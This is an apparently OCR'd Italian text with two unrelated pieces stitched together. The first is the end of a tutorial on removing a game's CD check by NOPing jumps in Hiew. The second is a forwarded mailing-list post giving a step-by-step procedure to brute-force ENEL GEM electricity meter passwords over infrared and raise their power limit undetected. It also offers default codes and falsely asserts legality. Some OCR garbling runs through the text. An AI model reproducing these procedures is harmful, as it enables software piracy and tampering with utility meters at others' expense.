in modo simile al Norton Commander. Usiamo i tasti cursore mer muoverci e andiamo nella directory 
doveabbiamo salvato l’exe che vogliamo crackare(per es. in c:\giochi\nfs2\nfsw.exe). Clicchiamo sull’exe che 
vogliamo craqckare(nfsw.exe).Vediamo codice su codice e non sappiamo cosa fare. Premiamo F4 e appare un 
menù. Nel menù selezioniamo Decode. Ora possiamo vedere una lista di numeri e altre cose. Ora premiamo F5 
e nel lato sinistro dello schermo possiamo inserire il numero che ci abbiamo segnato in Win32Dasm 
(00045821). Scriviamo il numero e veniamo spostati da Hiew nel punto dove il numero esiste. Ora vediamo molti 
numeri e il cursore è posizionato su EB1BC5E3E1 (in Need for Speed 2).Ok. Ogni due numeri abbiamo un byte. 
Qui abbiamo EB1BC5E3E1, quindi abbiamo 5 byte. Ora premiamo F3(modifica). Ora possiamo modifica re i 10 
numeri EB1BC5E3E1. Scriviamo 9. Se scriviamo veniamo spostati in altri punti, ma non è un problema. Il 9 è 
ancora lì. Ora scriviamo 0 e poi ancora 9 e 0. Lo faremo per ognuna delle coppie, quindi 5 volte. Premiamo 
F9(aggiorna).Abbiamo scritto 5 volte 90. Per ogni byte 90. Per EB=90 1B=90 C5=90 E3=90 E1=90.PER OGNI 
BYTE 90. 

Per esempio: se ci posizioniamo su E8D117FDFF (è il codice di @offset per i filmati, ma per ora non 
preoccupiamocene), significa 10 numeir = 5 byte e per ogni byte un 90!!!! Il numero 90 è il numero noop(no 
operation, nessuna operazione).Ok.Premiamo F10(Chiudi) Ora possiamo lanciare Need for Speed 2 senza 
CD!!! 

Abbiamo rimosso la protezione CD per Need for Speed 2!!!! 


OK L’ABBIAMO FATTO 


Ok abbiamo crackato la protezione CD. 


QUALCOSA DA RICORDARE 


La prima cosa da fare per crackare un gioco è lanciarlo senza CD! 

Poi guardare che messaggio di errore da. Devi ricordarti l’ultimo messaggio di errore e lanciare Win32Dasm e 
guardare sotto List of String Data dove troverai il messaggio di errore. Per esempio: lanci il gioco senza i filmati 
sul tuo HD. Il gioco ti darà un messaggio di errore tipo ,MOVIE FILE not found“. Ora potrai cercare in 
Win32Dasm dove trovi il messaggio di errore ,MOVIE FILE not found“. Se lo trovi fai doppio click su questo. 


Chiudi la List of Data String Items e torna su Win32Dasm, che si sarà spostato nel punto in cui si trova il 
messaggio di errore. Segnati ogni numero di @offset di jump e call (riconoscerai i comandi dalla barra che 
diventerà verde. Hai bisogno solo dei numeri senza la h!!!!Poi ti sposti in Hiew e scrivi il numero per ricercarlo. 
Poi modifica i comandi di call o jump con l’uso di 90 per ogni byte (ricorda che due numeri sono un byte). Poi 
selezioni aggiorna e chiudi. Ora hai noopato il gioco!!! 


F.A.Q. 


Domanda:Cosa faccio se ci sono più di una call o jump oppure una all e un jump? 

Risposta:Ok.Ora sei nel punto in cui comincia il vero crackare! One delle call o jump è ,Bravo Ragazzo" e l’altra 
è ,Cattivo Ragazzo“!!! Un bravo ragazzo è buono e se trasformi in noop il bravo ragazzo il gioco non funzionerà 
nel 99% dei casi. Ma qual è il buono e quale il cattivo?Non lo sappiamo!Devi provare!La miglior cosa da fare è 
salvare l’exe e andare avanti col vecchio duro metodo ,a tentativi‘. Provi il noop su un comando e controlli se il 
gioco funziona. Se funziona, bene, altrimenti ricarichi il vecchio exe e provi un altro numeri. All’inizio puoi 
provare a noopare ogni call e jump che vedi ma sono sicuro che il gioco poi non funzionerà. Devi provare 
differenti combinazioni di noop finchè non funziona!!! 


D:Non c’è il pulsante String Reference disponibile! 

R:In tal caso la possibilità di crackare il gioco scende al 5%. 

L’unica cosa che puoi provare è cercare a mano le parole chiave cd/movie/music/error... 

O guardare nell’HexWorkShop se trovi una stringa che puoi manipolare. Ma hai poche possibilità. 


D:Le ho provate tutte ma non riesco a crackare il gioco! 

R:Ci sono due possibili strade: 

1.:Hai fatto qualcosa di sbagliato(come noopare un Bravo Ragazzo, noopare qualcosa che il gioco richiede, non 
avete noopato abbastanza e non avete noopato le protezione richiesta o avete noopato troppe cose e il gioco 
non va) 

2.:Non puoi crackare il gioco perché è un'operazione troppo difficile o nessuno può crackare il gioco(più 
probabilmente la prima cosa). 


VELOCI PROMEMORIA 


- Due numeri sono un byte :E4c2A1 significa E4=1byte C2=1byte A1=1byte e per ogni byte un 90 (il numero 
noop) 

- Inizia senza CD e poi cerca il messagigo di errore presentato 

- Con il messaggio lancia Win32Dasm e vai nel menu String of Data Items 

- Cerca lo stesso messaggio di errore, facci un doppio click 

- Segna il numero dopo @offset senza h per ogni call e jump 

- Con il numero di @offset vai in Hiew e fai il noop all‘indirizzo 


QUESTO E‘TUTTO 


Spero tu capisca il mio testo e tu sia ora capace di crackare giochi e altre cose! 
So che non è facile da comprendere, ma se ci provi abbastanza poi diventerà più semplice 
Questo è il primo testo che scrivo riguardante i crack e non sarà certo l’ultimo!!! 


INFORMAZIONI 


Questo testo è stato scritto da The PuppetMaster2501. Sono membro di un nuovo gruppo di crackatori chiamato 
D.O.C. — Defenders of Cracking. Se hai qualche esperienza nel crackare hackare o puoi programmare strumenti 
in Turbo Pascal o C++ e vuoi essere un Defender invia un e-mail e ti contatterò (English only) 


Lucien91@hotmail.com 
Liberamente tradotto da littlelostsoul@hotmail.com 
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ITALIA 
Ciao! pirirejs Crea un gruppo - Gruppi sottoscritti - Info Account - Esci 
fkt-net : FKT-net (fisiokinesiterapia) [ Entra nel gruppo! ] 
Inizio Messaggi Messaggi Aiuto 
b Messaggi | r 5 = 
Rispondi | Inoltra | Visualizza origine | Separa Righe i | Bicereanellasshivio 
Solo per iscritti —Messaggio 434 di 599 | Precedente | Successivo [| Per tema ] Indice messaggi Msg # 
Chat Da: "Luciano Rebuttini" <iSklr@l1...> 
Documenti Data: Mer Set 17, 2003 9:44 pm 
Foto Oggetto: Importante. 
Collegamenti 
Database Cari amici, l'articolo che vi mando non è scentifico; ma dato che noi 
. con la corrente tanto in casa che per la nostra attività ci sguazziamo 
Sondaggi dentro, vi porto a conoscenza del bel regalo truffaldino che l'enel ci sta 
Iscritti preparando e come fregarli a nostra volta. 
Agenda Ciao ed a presto rileggervi. 


Promuovi 


IL NUOVO CONTATOR 


IT 


ENEL GEM 2002 


zal 


GUIDA ALLA SOPRAVVIVENZA 
Ovvero 


come aumentare da soli e gratuitamente la potenza da 3 a 6Kw 


Premessa 

ENEL ha iniziato ad installare in tutto il territorio i suoi nuovi contatori 

GEM 2002, sostituendo quelli vecchi che da decenni funzionavano benissimo. 
‘operazione è apparentemente a carico di ENEL, e non degli utenti. 


L 
In quasi 5 milioni di abitazioni italiane il contatore GEM è già in 
funzione, almeno altrettante abitazioni presto lo riceveranno in gradito 
omaggio molto presto; alla fine saranno 27 milioni i contatori rimpiazzati. 
Gradito? Sapete come funziona il nuovo contatore GEM ? Ma poi, che significa 
G 

G 

Ss 


G] 


M? 
EM è un acronimo di Gestione Elettrica Migliorata (o qualcosa del genere, 
ubdolo a sufficienza), ed è un apparato con controllo digitale dei consumi, 
in tempo quasi reale. E' stato progettato e prodotto dalla Echelon 
Corporation americana, società partecipata all'8% direttamente da Enel. Date 
un'occhiata alla loro pagina 
www.echelon.com/about/press/2000/stockSaleEnel.htm , prevedono di 
installarne 27 milioni!! Costo degli apparati: 130 milioni di dollari, buon 
per loro. 
Al suo interno, un vero e proprio computer, che monitorizza costantemente 
lo stato di utilizzo della rete, ed è in grado di "dialogare" teoricamente 
con la centrale adeguando i carichi sul territorio. L'apparecchio è 
diabolico. Ogni famiglia italiana da decine d'anni ha un contratto enel che 
prevede erogazione per 3 Kw (chilowatt), a fronte dei quali paga un canone 
oltre ai consumi. La tolleranza (ovvero la capacità di sopportare carichi 
superiori) dei vecchi contatori è ampia, e se capita che salti la luce, 
quasi certamente c'erano accesi apparecchi con consumi elevati , come ad 
esempio una lavatrice ed una lavastoviglie allo stesso tempo. Oppure il 
microonde, il forno elettrico, lampade alogene ed una stufa. Il contatore 
staccava, perché il carico era davvero eccessivo. 

Con il GEM installato, le famiglie italiane si sono di colpo trovate di 
fronte ad un problema. Il GEM stacca con precisione e senza tolleranza. 
Accendete il forno elettrico, provate ad asciugarvi i capelli mentre 
l'arrosto cuoce: salta la luce. L'asciugacapelli non può funzionare insieme 
al forno. Scordatevi la lavatrice. Se cucinate non lavate, se lavate non 


asciugate. 
Per fortuna c'è una soluzione: con soli 200 euro (quattrocento mila vecchie 
lire, mica noccioline) potete "estendere" la capacità del contatore, 


portandola a 4,5 Kw, o anche più. Aumenta anche il canone, di 80 euro al 
bimestre, naturalmente. Indovinate a cosa servono le 200 euro? A ripagare il 
contatore e la sua installazione! 

Poi vi ritrovate un canone più costoso, le stesse identiche prestazioni 
del contatore vecchio. Perché la corrente disponibile con il GEM tarato per 
4,5Kw senza tolleranza, è la stessa del vecchio contatore da 3 Kw che era 
molto tollerante. Insomma, siete stati buggerati. 

L'associazione dei consumatori si sta muovendo, perché i reclami si 
sprecano. Inutile chiedere di controllare il contatore: il GEM funziona 
benissimo, e l'uscita per controllarlo è tariffata 50 euro. 


Tutto questo è vergognoso. ENEL ha deliberatament scogitato un piano per 
estorcere, in pieno regime di monopolio e quindi senza alternative per le 
sue vittime, 200 euro a famiglia italiana per il nuovo contatore, oltre ad 


un canone annuo maggiorato di quasi un milione di vecchie lire. Ci sarebbero 
gli estremi per muovere il parlamento, e tirare giù dalle sedie i nostri 
politici con il cervello atrofizzato. Per fortuna c'è una soluzione. 


Un po' di teoria.. 


Il GEM ha una "porta" di accesso remoto a raggi infrarossi, simile a quella 
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presente sui telecomandi dei televisori, sui telefonini, e sui computer 
portatili. La vedete nella foto. Per la sua configurazione, non serve un 
cavo speciale: il personale si interfaccia con il vostro contatore 
semplicemente avvicinandosi a meno di 30 centimetri, e lo fa naturalmente 
con un computer portatile. 


L'accesso è protetto per impedire di accedere all'apparato senza essere 
autorizzati. 

Gli apparati GEM ricordatelo sono computer, ed eseguono semplicemente un 
programma. 
Nel display a cristalli liquidi potete visualizzare in qualsiasi momento lo 
stato di funzionamento, il carico istantaneo, i parametri di configurazione 
tra i quali.. la potenza tollerata. Dice 3.6Kw: il vostro contratto è di 3 
Kw, e il GEM tollera 600 watt per un minuto. Lo stacco avviene dopo un 
minuto dall'eccesso di assorbimento. Per visualizzare i parametri, si 
utilizza sempre lo stesso tasto, l'unico presente sul GEM. 


Il contatore GEM parla con la centrale per comunicare i consumi E PER 
COMUNICARE LE VARIAZIONI LOCALI AL CONTATORE. Per il resto, i contatori 
stanno zitti ed il server pure, in attesa di loro eventuali notizie. 


ni 


Per nostra fortuna, chi ha programmato il GEM ha previsto una condizione di 
emergenza denominata "network fault", ovvero "guasto di rete. La condizione 
di "NF" si verifica teoricamente quando il GEM SERVER centrale, che 
controlla e pilota i contatori (e li legge), cessa per qualsiasi motivo di 
funzionare. Il "dialogo" tra server centrale GEM contatore GEM dell'utente 
avviene tramite rete elettrica mediante onde convogliate, lo stesso 
principio usato - per esempio - dagli interfoni, e dalle reti dati di questo 
tipo. Enel prevede di utilizzare lo stesso sistema per offrire connettività 
ad internet. Un interessante articolo lo potete trovare su 
http://www.geocities.com/ik4nyy/cavi elettrici.html (è datato, ma va bene lo 
stesso) oppure cercate su Google ' "onde convogliate" Enel ' , capirete di 
cosa stiamo parlando. Orbene, se il server centrale saltasse, qualcuno 
potrebbe "trasmettere" sulla rete elettrica al suo posto, pretendendo di 


essere il GEM server, spegnere o alterare i contatori, mettendo al buio 
l'Italia intera. E' un'eventualità remota, ma non impossibile: per questo, i 
contatori in mancanza di dialogo con il server central ntrano in Network 


Fault, fase durante la quale cessano di dialogare con il server, e rimangono 
in attesa di un suo "risveglio ufficiale". 


Se avete letto con attenzione quanto sopra scritto, avrete certament 
identificato una possibile condizione anomala, che è quella che andiamo ad 
esaminare. 


Che succede se il contatore GEM entra in Newtork Fault ma il GEM server non 
lo sa? 


Il server e il contatore NON si parlano. 
Quindi, se per ipotesi fosse possibile: 

A) metterlo in condizione di Network Fault 

B) riprogrammare il GEM 

C) toglierlo dalla condizione di Network Fault 


Il server centrale non ne saprebbe niente, i consumi sarebbero normalmente 
registrati... ma la configurazione del GEM rimarrebbe quella nuova. 


E' esattamente quello che siamo riusciti ad ottenere. Utilizzando un PC 
portatile con porta infrarosso (ce l'hanno tutti!), collegandoci con il GEM 
semplicemente avvicinandoci alla sua porta infrarosso, mandando una sequenza 
di autenticazione locale, richiedendo la condizione di Network Fault in modo 
manuale (da menù di test dell'apparato, incredibilmente a disposizione!!), 
modificando e salvando la nuova configurazione dove il carico è di 6 Kw (il 
doppio di prima!), ed infine ripristinando la condizione di normalità. 


Tempo necessario per l'operazione: con il codice giusto, meno di un minuto! 


Cosa succede dopo? Niente. La centrale potrebbe ripristinare il carico da 
3Kw. E voi rimettere i 6. Non avete richiesto alcuna modifica contrattuale, 
quindi non pagate alcun canone aggiuntivo né quei famosi 200 euri. Non avete 
alterato in alcun modo il contatore, non l'avete aperto, non avete commesso 
alcun atto illecito. In ogni caso, non potete sapere chi lo ha fatto, perché 
il contatore (che è dell'ENEL, mica vostro) è in locali pubblici o in 
strada, chiunque può accedervi. 


Dovranno cambiare di nuovo i contatori, o meglio intervenire cambiando 
completamente il software, uno per uno, e sono milioni! Siete in una botte 
di ferro. Pagate regolarmente i consumi. Anzi, probabilmente consumate di 
più di prima! In fondo è quello che volevate: poter consumare di più, 
lasciando accesa la lavatrice, il forno e l'asciugacapelli allo stesso 
momento. 

La procedura pratica! 


Dopo tante chiacchiere sulla teoria, ecco la pratica. Come modificare la 
configurazione del loro/vostro contatore Enel GEM 2002 senza che la central 
lo sappia. Una premessa importante: 

Vi serve un computer portatile con porta infrarossi, senza nessun programma 
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particolare se non Hyperterminal , che è presente su tutte le versioni di 
Windows. 


Vi serve conoscere il vostro codice di utenza (che non è un segreto per 
nessuno: SI LEGGE DIRETTAMENTE DAL DISPLAY DEL CONTATORE!! QUELLO DI 
CHIUNQUE. Ma non approfittatene per abbassare a 1 Kw il contatore del vicino 
che schiamazza di notte, sarebbe molto grave). 


Vi serve conoscere il codice di accesso al vostro contatore, che è un numero 
formato da: 


esempio 871.917.721 è il codice di utenza 
ll codice di accesso potrebbe essere: 8719177210000 nel caso la password 


fosse 0000 ... cosa che in alcuni fortunati casi è vera! Sono dei geni. Si 
sono in molti casi dimenticati di modificare la password da centrale! 
Capirete, stanno ancora installando i contatori in giro per l'italia, 


qualcuno ha anche preso fuoco, hanno altre grane da risolvere al momento. 
Comunque, la password va da 0000 a 9999 sono diecimila tentativi (fatti dal 
computer, mica da voi). 

La fregatura sta nel fatto che dopo 3 tentativi sbagliati, occorre aspettare 
1 minuto per riprovarci (come con i telefonini). Ma il gioco vale la 
candela. 


Lanciate Hyperterminal utilizzando la porta infrarossi come porta di 
comunicazione. 

I parametri di trasmissione devono essere: 9600 bps, 8 bit dati, 1 bit stop, 
nessuna parità. 

Avvicinatevi al contatore posizionando la porta infrarossi del PC il più 
possibile vicino alla porta infrarossi del GEM. 

Digitate (o copiate con taglia incolla, o mandate con un programma anche 
scritto in basic) il codice di accesso. Provate con 0000 per prima cosa! In 
alcuni casi, 1234 è risultato funzionante. 

Se il codice è corretto, il GEM risponde mandando la schermata di 
configurazione: 


Entrate nel menù TEST APPARATO (4 invio), poi 8 invio per Network Fault on. 
L'apparato risponde con ESEGUITO, e ritorna al menù di prima. 

Entrate nel menù CONFIGURAZIONE (1 invio), poi 1 invio per Capacità. 
Inserite 6 e poi invio (per 6 Kw, oppure 4,5 con la virgola per 4.5 Kw, non 
provate valori superiori a 6, potete invece provare valori decimali 
qualsiasi da 1 a 6 per esempio 3.6 che è quello standard che vi ritrovate a 
bordo) . 

Tornate al menu TEST APPARATO, selezionate 8 invio per Nework fault off 
Battete 0 invio per uscire. 


Andate a casa e accendete tutto quello che volete. Ricordatevi che pagate i 


consumi. 

Epilogo 

Alcuni dettagli importanti: il GEM non invia segnalazione alla centrale se 
sbagliate il codice. Motivo: eventuali interferenze possono di fatto causare 
"falsi negativi" sulla porta, provocando in modo continuato inutili allarmi. 


L'operatore che si mette col PC davanti alla porta del GEM aspetta un minuto 
e poi si collega, se ci sono problemi di questo tipo. Il GEM pertanto è 
programmato per NON inviare segnalazione di allarme sull'accesso mancato. 


Per rendere automatica la ricerca del codice, se non è valido quello di 
default (0000 oppure 1234) sarà disponibile a breve un programmino in basic 
che lo fa da solo, aspettando correttamente dopo tre tentativi. La centrale 
potrebbe in futuro cambiare la password, ma la procedura rimane sempre la 
stessa. Il programmino sarà disponibile tra qualche giorno, lo stiamo 
facendo senza troppi fronzoli ma perfettamente funzionante: dato il codice 
di utenza fa tutto lui. Se conosce già la password perché l'ha trovata in 
precedenza, si collega, modifica a 6Kw la capacità e si scollega da solo, il 
tutto in 13 secondi netti!! 


Infine, il GEM non può essere aggiornato da centrale. Ovvero: il firmware 
(il software a bordo del GEM, che lo fa funzionare) dev ssere cambiato 
manualmente accedendo direttamente al GEM in locale. E l'aggiornamento 


richiede almeno 10 minuti di lavoro per singolo apparato. Oltre alla visita 
in loco del tecnico. Poniamo che mediamente ci metta 30 minuti per 
contatore, diciamo che un tecnico riesca a fare 20 contatori in una 
giornata, ad un costo giornaliero bassissimo.. l'ENEL spenderà per rimetter 
le cose a posto tra i 35 ed i 50 miliardi di vecchie lire!! Complimenti 
bella mossa. 


All'Enel l'avevano proprio pensata bene, farsi dare 200 euro oltre al canone 
maggiorato da ogni famiglia italiana. Il diavolo fa le pentole ma non i 


coperchi! 
Il coperchio lo ha fornito un amico americano che ha lavorato sul progetto 
in Echelon negli Stati Uniti, ha recentemente cambiato lavoro 


trasferendosi qui in Italia. 


Aggiornamenti 
Onde convogliate: sono utilizzate? 
Innanzitutto, meglio chiarire che la maggior parte dei contatori installati 


(che sono una minima parte di quelli che devono essere installati in Italia) 
NON sono collegati con la centrale mediante onde convogliate. Lo saranno in 
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futuro, ma è probabile che prima Enel finisca di completare il rimpiazzo dei 
vecchi apparati. Speriamo tutti che tra un annetto o forse più (data 
ottimistica per installare 12 milioni di contatori, mi dicono) le 
associazioni dei consumatori spinte da una massa imponente di consumatori 


inferociti riesca a negoziare PERLOMENO il cambio di contratto gratuito, 
com'era all'inizio della farsa. A quel punto il popolo italiano sarà diviso 
in due parti: quelli che hanno versato le 200 euro, quelli che non l'hanno 
fatto. 


Password di accesso al contatore 


Oltre a quelle di default, 0000 e 1234 sembra essere ricorrente una terza 
password 3635 (che in effetti corrisponde alle lettere Enel almeno sulla 


tastiera di un telefonino.. si vede che hanno fantasia). 
Io non ho riscontri da chi legge queste pagine, perché non mi fido a mettere 
un indirizzo di email. Ho soltanto riscontri da amici che stanno provandoci, 


devo dire con risultati contrastanti. In un caso la password era 1234 ma il 
computer che veniva usato aveva qualche problema con la sua porta 
infrarossi. Ha funzionato utilizzando un palmare (Palm V) che ha sia 
infrarossi che terminal emulator. 

Non possiedo un palmare, quindi non posso fornire indicazioni per il suo 
utilizzo anche se sembra più semplice del Pc. 


L'idea del secolo...?? 


Un buontempone di amico mi ha fatto notare che anche i telefonini hanno una 
porta infrarossi. L'idea non ha né capo né coda: lasciate perdere. 
Perdereste solo del tempo. 


Echelon esiste? Questo sito è una farsa? 


Toglietevi il dubbio, fate una ricerca su internet traete le vostre 
conclusioni sull'esistenza di Echelon Corporation, sulla partnership con 
Enel, sul numero di contatori che hanno prodotto, sulle onde convogliate. 
Troverete anche un articolo dove si parlava già dei potenziali problemi di 


quel prodotto, tra cui il rischio incendio, puntualmente verificatosi e 
documentato da Striscia la Notizia già qualche mese fa (è bruciato un 
appartamento, e i pompieri hanno dimostrato che a bruciare è stato .. il 
contatore!!!). 

E' evidente che il problema la gente se lo pone quando la corrente comincia 
a saltare due o tre volte per sera. Questo sito non è una farsa, la farsa è 
di Enel che ci chiede 200 euro per ripagare il contatore che avrebbe dovuto 


essere gratuito. Gli scrupoli morali non dovrebbero toccare la nostra 
coscienza nel provare a riconfigurare il contatore, perché all'Enel non ne 
hanno avuti nel tentativo di "riconfigurare" il nostro portafoglio. 

Ma l'associazione dei consumatori dorme il sonno del giusto o quello del 
narcotizzato?? 
Non sappiamo se queste pagine rimarranno visibili a lungo. Potete immaginare 


quanto sia felice Enel (wind, infostrada, fastweb... tutte società Enel) nel 
leggerle. Avrà un bel da fare a minacciare di non provarci, ad avvisare che 
illegale (e non è vero), a smentire ed in generale a mentire, mentre 1 


nostre associazioni dei consumatori possono fare molto poco. 


marzo 2003 


Luciano Rebuttini. 

Via Della Pace Mondiale 92. 
Badia a Settimo 

Firenze. 
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